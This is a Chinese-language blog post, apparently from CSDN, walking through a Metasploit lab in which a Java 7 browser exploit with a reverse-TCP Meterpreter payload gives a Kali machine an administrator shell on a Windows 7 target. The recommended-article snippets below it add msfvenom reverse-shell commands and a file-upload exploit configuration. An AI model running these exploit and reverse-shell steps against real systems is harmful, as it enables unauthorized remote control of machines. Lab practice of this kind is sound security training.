MSF基于JAVA的漏洞获取shell实战

最新推荐文章于 2023-05-23 17:39:08 发布
最新推荐文章于 2023-05-23 17:39:08 发布
阅读量676 收藏 3
点赞数 4
分类专栏: Kali Linux 文章标签: 渗透测试 JAVA 信息安全 Kali Linux MSF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_40228200/article/details/125240022
版权

今天继续给大家介绍渗透测试相关知识,本文主要内容是MSF基于JAVA的漏洞获取shell实战。

免责声明:
本文所介绍的内容仅做学习交流使用,严禁利用文中技术进行非法行为,否则造成一切严重后果自负!
再次强调:严禁对未授权设备进行渗透测试!

一、环境准备

今天,我们进行MSF基于JAVA的漏洞获取shell实战。
我们利用Kali Linux作为攻击机,利用一台Windows7作为靶机来,其中Windows7设备上必须安装有1.7版本的JAVA环境。

二、MSF设置

在Kali Linux上,我们执行命令:

use exploit/multi/browser/java_jre17_driver_manager

并且,执行命令:

set payload java/meterpreter/reverse_tcp

作为该模块的payload,设置LHOST参数为Kali Linux的IP地址,所有设置完成后如下所示:
在这里插入图片描述
之后,我们执行run,运行该模块,结果如下所示:
在这里插入图片描述
从上图可以看出,该模块执行后,会自动返回一个网址链接。

三、效果检验

在Window7设备上,我们尝试访问该链接,结果如下所示:
在这里插入图片描述
可以看出,在这里反馈了一个JAVA版本过低的提示,我们在这一步选择稍后安抓(Later)。之后,会弹出如下页面:
在这里插入图片描述
在这里,我们选择点击“运行”。那么我们在Kali Linux设备上,就可以看到Windows设备成功连接到Kali Linux,我们也因此获取到Windows7设备的shell了,如下所示:
在这里插入图片描述
在这里插入图片描述
在上图中,我们可以看出,我们获得了Windows7设备的管理员权限。
原创不易,转载请说明出处:https://blog.csdn.net/weixin_40228200

永远是少年啊
关注
  • 4
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
通信与网络中的MSF基于组件的业务框架
11-14
MSF定义的基于组件的业务框架如图所示。该框架包括业务组件和业务代理两大主要功能。业务组件是捆绑或集成在一起的多个业务对象,用来创建销售给用户的业务,有三种类型的业务组件。   图 MSF基于组件的业务框架   (1)应用层业务组件(ASC)   这些组件通常与应用服务器有关,通过信令访问,由一系列输入输出交互准则定义。例如,基于SIP的业务交互中,相关ASC必须理解发送或接收的不同SIP消息中特定的参数。   (2)媒体服务组件(MSC)   MSC用于与媒体通路的交互,MSC大多与媒体服务器有关,包括一些功能如文本到语音的转化、交互式语音识别系统、会议桥等。   (3)数据
命令执行漏洞 java_白帽子挖洞—命令执行(Commnd Execution)篇
weixin_35117981的博客
02-19 856
0x00介绍命令执行漏洞概念:当应用需要调用一些外部程序去处理内容的情况下,就会用到一些执行系统命令的函数。如PHP中的system,exec,shell_exec等,当用户可以控制命令执行函数中的参数时,将可注入恶意系统命令到正常命令中,造成命令执行攻击。漏洞成因:脚本语言优点是简洁,方便,但也伴随着一些问题,如速度慢,无法解除系统底层,如果我们开发的应用需要一些除去web的特殊功能时,就需要调...
使用java执行shell脚本踩的坑,共勉
GDFHGFHGFH的博客
02-27 1342
背景 手上的项目属于数据库运维方面的项目,本人是属于java组,数据库DBA组,给了脚本,让执行 遇到的问题 问题1:不知道怎么写 以前没有在程序中执行过脚本,所以就到网上搜了搜,大部分给出的答案,基本都是以下两个答案 第一种,如下面这样的方法 Process p=Runtime.getRuntime().exec("命令") p.waitFor(); 第二种 ProcessBuilder builder = new ProcessBuilder("命令"); Process process = bui
基于java环境漏洞利用
xiao_he0123的博客
02-27 2669
基于java环境的漏洞利用获取shell前言二、操作步骤1.执行监听设置参数2.运行木马构建session总结 前言 一般基于Java的软件开发的电脑上,做财务,大数据,税控软件,收银,OA软件上都会有Java环境的搭建和配置可以利用到这个漏洞 二、操作步骤 1.执行监听设置参数 #开启msf msfconsole #设置参数 use exploit/multi/browser/java_jre17_driver_manage #选取所用的模块 show payloads #查看Java模块中可以使用的
MSF实战-利用0day双杀java环境-宏感染-安卓客户端进行渗透
L120305q的博客
03-31 635
MSF实战笔记
msfconsole之制作windows木马并成功获取shell
qq_56228347的博客
11-22 3367
msfconsole制作windows木马并上线获取控制权限
MSF制作Windows客户端恶意软件获取SHELL过程
永远是少年
06-10 1045
今天继续给大家介绍渗透测试相关知识,本文主要内容是MSF制作Windows客户端恶意软件获取SHELL。 一、后门程序生成 二、MSF监听 三、效果检验 (一)MSF监听结果 (二)恶意软件扫描
MSF利用宏病毒感染word文档获取shell复现
永远是少年
06-14 1984
今天继续给大家介绍渗透测试相关知识,本文主要内容是MSF利用宏病毒感染word文档获取shell复现。 一、环境准备 二、宏文档生成 三、效果检验
msfvenom获取shell
01-03
仅用于测试 msfvenom各平台生成木马大全: windows: msfvenom -a x86 –platform Windows -p ...msfvenom -a x86 –platform osx -p osx/x86/shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f macho -o payload.ma
基于 javalin 包装的 java MSF,适用于各种微服务项目
11-20
基于 javalin 包装的 java MSF,适用于各种微服务项目. java -jar ./paoding.admin-1.0-SNAPSHOT.jar -Xms100m -Xmx100m -XX:+PrintGCDetails -XX:+PrintGCDateStamps -Xloggc: ./gc-PODIP− (date).log -XX:+...
基于MSF的增强版多源传感器融合框架 (VSLAMIMUGNSS).zip
01-24
ETH的MSF是一个非常优秀的多源传感器融合(松耦合)开源框架,尽管是松耦合,但是最终经过修改和调试后的MSF的效果依然让我觉得非常惊喜。同时由于MSF原始代码非常的不优美简洁,所以我特地将MSF源码作为一个“库”...
iis 6.0 CVE-2017-7269 Msf 反弹shell
01-23
iis 6.0 CVE-2017-7269 Msf 反弹shell metasploit漏洞测试利用模块
kali使用Metasploit Framework(msf获取shell
Mrw的博客
04-05 2752
简介 Metasploit Framework是一个编写,测试和使用exploit代码的完善环境。这个环境为渗透测试shellcode编写和漏洞研究提供了一个可靠的平台,这个框架主要是由面向对象的Ruby编程语言编写的,并带有由C语言,汇编程序和Python编写的可选组件。 Msfconsole提供了一个一体化的集中控制台。通过msfconsole,你可以访问和使用所有的metasploit的插...
【学习笔记】msf-java木马源码分析
rm -rf *
01-31 765
metasploit-java木马-源码学习
基于 java 环境的漏洞利用获取 Windows系统shell
Cwillchris的博客
05-27 392
基于 java 环境的漏洞利用获取 shell 实验环境: kali攻击机(192.168.98.30) window目标机(192.168.98.35) jre-7u17-windows-i586.exe 实验步骤: 1、搭建java环境 xshell上传jre-7u17-windows-i586.exe到win7 安装都一直点下一步就可以 2、 使用 java 模块 getshell msfbd run //进入msf use exploit/multi/brow
Metasploitable2靶机之第九篇--Java RMI SERVER 命令执行漏洞
千寻的博客
04-03 1266
文章目录环境原理漏洞利用摘抄 环境 原理 漏洞利用 摘抄
Java:使用java调用shell命令并获取返回结果的代码
netyeaxi的专栏
05-23 2600
提供一段简单的使用java调用shell命令并获取返回结果的代码
Java安全』shell命令执行的几种方式与Runtime.exec()本地命令执行漏洞调用分析
Ho1aAs‘s Blog
11-20 5599
文章目录命令执行Runtime.exec()ProcessBuilder.start()ProcessImpl与UNIXProcessRuntime.exec()命令执行漏洞完 命令执行 Runtime.exec() 在传入命令时,可以传入String和String[] String cmd1 = "/bin/sh -c whoami"; String[] cmd2 = {"/bin/sh", "-c", "whoami"}; 这是由于exec()方法自带多种重载方法,其中envp指定环境,dir指定目录
基于SSM+JSP的企业人事管理信息系统毕业设计(源码+录像+说明).rar
最新发布
05-09
基于SSM+JSP的企业人事管理信息系统毕业设计(源码+录像+说明).rar 【项目技术】 开发语言:Java 框架:ssm+jsp 架构:B/S 数据库:mysql 【演示视频-编号:420】 https://pan.quark.cn/s/b3a97032fae7 【实现功能】 实现了员工基础数据的管理,考勤管理,福利管理,薪资管理,奖惩管理,考核管理,培训管理,招聘管理,公告管理,基础数据管理等功能。
msf 文件上传漏洞 模块使用案例
06-06
MSF(Metasploit Framework)是一款功能强大的渗透测试工具,其中包含了很多漏洞利用模块。其中,文件上传漏洞是常见的一种漏洞类型,攻击者可以利用该漏洞上传恶意文件,从而控制目标系统。下面是一个使用MSF的文件上传漏洞利用模块的案例: 1. 首先,使用MSF的search命令查找可用的文件上传漏洞利用模块,命令如下: ``` msf > search upload ``` 2. 找到一个目标系统存在文件上传漏洞的网站,并确定上传文件的路径和可上传的文件类型。 3. 利用MSF的exploit命令选择相应的模块,并设置相关参数,例如: ``` msf > use exploit/multi/http/wp_contact_form_7_file_upload msf exploit(wp_contact_form_7_file_upload) > set RHOSTS 192.168.1.100 msf exploit(wp_contact_form_7_file_upload) > set TARGETURI /contact msf exploit(wp_contact_form_7_file_upload) > set PAYLOAD php/meterpreter/reverse_tcp msf exploit(wp_contact_form_7_file_upload) > set LHOST 192.168.1.200 ``` 其中,RHOSTS为目标系统的IP地址,TARGETURI为上传文件的路径,PAYLOAD为要上传的恶意文件类型,LHOST为攻击者的IP地址。 4. 运行exploit命令,执行漏洞利用,上传恶意文件并获得对目标系统的控制: ``` msf exploit(wp_contact_form_7_file_upload) > exploit ``` 以上就是使用MSF的文件上传漏洞利用模块的一个案例。需要注意的是,在实际漏洞利用中,应该先进行充分的测试和准备,避免对目标系统造成不必要的损失。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

永远是少年啊

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值